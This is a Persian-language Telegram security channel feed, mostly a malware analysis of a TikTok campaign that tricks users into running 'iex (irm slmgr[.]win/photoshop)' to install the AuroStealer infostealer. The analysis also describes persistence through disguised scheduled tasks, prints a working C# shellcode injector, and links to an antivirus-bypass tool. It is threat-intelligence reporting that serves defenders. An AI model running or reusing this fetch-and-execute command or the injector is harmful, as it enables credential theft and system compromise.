گروه Famous Chollima به طور مداوم در حال بهبود تاکتیکها، تکنیکها و رویههای (TTPs) خود است. ادغام BeaverTail و OtterCookie و افزودن قابلیتهای جدید نشاندهنده سرمایهگذاری این گروه برای ساخت ابزارهای مخرب کارآمدتر و پنهانکارتر است. جامعه توسعهدهندگان به دلیل ماهیت کار خود که شامل استفاده گسترده از پکیجمنیجرها و کدهای شخص ثالث است، یک هدف اصلی برای این نوع حملات زنجیره تأمین (Supply Chain Attack) محسوب میشود.
@NullError_ir
هکرها با استفاده از ویدیوهای TikTok، بدافزار خود را نصب میکنند
این گزارش به تحلیل یک کمپین فعال مهندسی اجتماعی در پلتفرم TikTok میپردازد که کاربران را با وعده فعالسازی رایگان نرمافزارهای گرانقیمت مانند Photoshop، فریب داده و به نصب بدافزار سارق اطلاعات (InfoStealer) به نام AuroStealer آلوده میکند. این تحلیل، زنجیره آلودگی (Kill Chain) و تکنیکهای پیشرفته مورد استفاده مهاجمان را تشریح میکند.
مهاجمان از پلتفرم محبوب TikTok برای انتشار ویدئوهای فریبنده استفاده میکنند.
* طعمه : ارائه راهی آسان برای فعالسازی رایگان Adobe Photoshop.
* تکنیک: این حمله از یک تکنیک مهندسی اجتماعی مشابه ClickFix بهره میبرد. در این روش، به جای ارسال یک فایل اجرایی، قربانی ترغیب میشود تا با دسترسی Administrator ، یک خط فرمان PowerShell را مستقیماً اجرا کند. این کار باعث میشود کاربر، خود، مکانیزمهای امنیتی اولیه را دور بزند.
* فرمان مخرب:
iex (irm slmgr[.]win/photoshop)
۔* irm (Invoke-RestMethod): این cmdlet محتوا را از URL مشخص شده (
slmgr[.]win/photoshop) دانلود میکند.۔* iex (Invoke-Expression): این cmdlet خطرناک، محتوای دانلود شده (که یک اسکریپت پاورشل است) را مستقیماً در حافظه اجرا میکند. این یک تکنیک "fileless" (بدون فایل) است که از شناسایی مبتنی بر فایل توسط آنتیویروسها جلوگیری میکند.
## تحلیل زنجیره آلودگی (Kill Chain Analysis)
مرحله اول: اسکریپت پاورشل (Stager)
اسکریپت پاورشل دانلود شده از
slmgr[.]win (با هش SHA256: 6D897B56...) به عنوان مرحله اول (Stager) عمل میکند و دو وظیفه اصلی دارد:1. دانلود payload: دانلود مرحله بعدی بدافزار (
updater.exe) از آدرس https://file-epq[.]pages[.]dev/updater.exe2. ایجاد ماندگاری (Persistence):
* این اسکریپت یک Scheduled Task (وظیفه زمانبندی شده) ایجاد میکند تا بدافزار در هر بار لاگین کاربر اجرا شود (
-Trigger (New-ScheduledTaskTrigger -AtLogOn)).* تکنیک فرار از شناسایی (Evasion): برای جلوگیری از شناسایی و ترکیب شدن با وظایف سیستمی، اسکریپت به صورت تصادفی یکی از نامهای موجه زیر را برای وظیفه خود انتخاب میکند:
*
MicrosoftEdgeUpdateTaskMachineCore*
GoogleUpdateTaskMachineCore*
AdobeUpdateTask*
OfficeBackgroundTaskHandlerRegistration*
WindowsUpdateCheck* این وظیفه با بالاترین سطح دسترسی (
-RunLevel Highest) اجرا میشود، زیرا قربانی در ابتدا پاورشل را با دسترسی ادمین اجرا کرده است.مرحله دوم: پیلود اصلی (AuroStealer)
* فایل
updater.exe (با هش SHA256: 58b11b4d...) که توسط گزارش SANS به عنوان بدافزار AuroStealer (بر اساس Malpedia) شناسایی شده است.۔* AuroStealer یک (InfoStealer) است که احتمالاً مبتنی بر .NET میباشد. این نوع بدافزارها به طور خاص برای سرقت اطلاعات حساس مانند کوکیهای مرورگر، رمزهای عبور ذخیره شده، اطلاعات کارتهای اعتباری و دادههای مربوط به کیف پولهای ارز دیجیتال طراحی شدهاند.
مرحله سوم: پیلود ثانویه و تکنیک "خود-کامپایلی" (Self-Compiling)
* در نهایت، پیلود دومی به نام
source.exe (با هش SHA256: db57e4a7...) دانلود و اجرا میشود.* تکنیک پیشرفته (TTP): این بدافزار از یک تکنیک جالب برای فرار از شناسایی به نام "On-Demand Compilation" یا "Self-Compiling Malware" استفاده میکند.
1. بدافزار
source.exe به جای حمل مستقیم کد مخرب نهایی، حاوی سورس کد C\# است.2. سپس، کامپایلر قانونی و امضا شده مایکروسافت (
csc.exe) را که بخشی از .NET Framework است، فراخوانی میکند:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline3. این دستور، سورس کد موجود در فایل
vpkwkdbo.cmdline را در لحظه بر روی سیستم قربانی کامپایل میکند.* تحلیل کد C\# کامپایل شده: کد C\# کامپایل شده یک کلاس ساده به نام
SC ایجاد میکند که یک Shellcode Injector کلاسیک است:Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
public class SC {
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr addr, IntPtr p, uint f, IntPtr t);
[DllImport("kernel32.dll")]
public static extern uint WaitForSingleObject(IntPtr h, uint m);
public static void Run(byte[] sc) {
// 1. تخصیص حافظه با دسترسی RWX (Read-Write-Execute)
IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
// 2. کپی کردن شلکد در حافظه تخصیص یافته
Marshal.Copy(sc, 0, addr, sc.Length);
// 3. اجرای شلکد در یک نخ (Thread) جدید
IntPtr t = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(t, 0xFFFFFFFF);
}
}* اهمیت تکنیک: این روش بسیار موثر است زیرا:
1. فرار از تحلیل استاتیک: فایل
source.exe فاقد کدهای مخرب نهایی است و صرفاً سورس کد C\# را حمل میکند که شناسایی آن دشوارتر است.2. استفاده از LotL (Living-off-the-Land): از یک ابزار قانونی و مورد اعتماد سیستمعامل (
csc.exe) برای ساخت پیلود نهایی سوءاستفاده میکند.3. اجرای در حافظه: شلکد نهایی (که احتمالاً خود AuroStealer یا یک RAT است) مستقیماً در حافظه اجرا میشود و هیچ فایل اجرایی جدیدی روی دیسک باقی نمیگذارد.
* استفاده از
VirtualAlloc با پرچم 0x40 (PAGE\_EXECUTE\_READWRITE) یک پرچم قرمز بزرگ در تحلیل بدافزار است، زیرا به حافظه اجازه میدهد همزمان قابل نوشتن و قابل اجرا باشد (نقض اصل W^X).@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - TwoSevenOneT/DefenderWrite: A tool that supports finding and abusing whitelisted programs to allow arbitrary file writing…
A tool that supports finding and abusing whitelisted programs to allow arbitrary file writing into the executable folder of Antivirus software - TwoSevenOneT/DefenderWrite